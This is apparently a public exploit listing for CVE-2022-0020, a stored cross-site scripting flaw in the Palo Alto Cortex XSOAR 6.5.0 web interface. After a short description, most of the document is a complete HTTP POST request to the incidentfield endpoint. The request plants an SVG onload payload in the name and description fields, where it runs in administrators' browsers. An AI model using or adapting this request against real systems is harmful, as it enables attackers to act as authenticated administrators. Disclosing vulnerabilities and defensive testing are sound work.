Share
## https://sploitus.com/exploit?id=PACKETSTORM:171782
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)  
# Exploit Author: omurugur  
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020  
# Version: 6.5.0 - 6.2.0 - 6.1.0  
# Tested on: [relevant os]  
# CVE : CVE-2022-0020  
# Author Web: https://www.justsecnow.com  
# Author Social: @omurugurrr  
  
  
A stored cross-site scripting (XSS) vulnerability in Palo Alto Network  
Cortex XSOAR web interface enables an authenticated network-based attacker  
to store a persistent javascript payload that will perform arbitrary  
actions in the Cortex XSOAR web interface on behalf of authenticated  
administrators who encounter the payload during normal operations.  
  
POST /acc_UAB(MAY)/incidentfield HTTP/1.1  
Host: x.x.x.x  
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;  
isTimLicense=false  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)  
Gecko/20100101 Firefox/94.0  
Accept: application/json  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://x.x.x.x/acc_UAB(MAY)  
Content-Type: application/json  
X-Xsrf-Token:  
Api_truncate_results: true  
Origin: https://x.x.x.x  
Content-Length: 373  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers  
Connection: close  
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field  
edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}  
  
Regards,  
  
Omur UGUR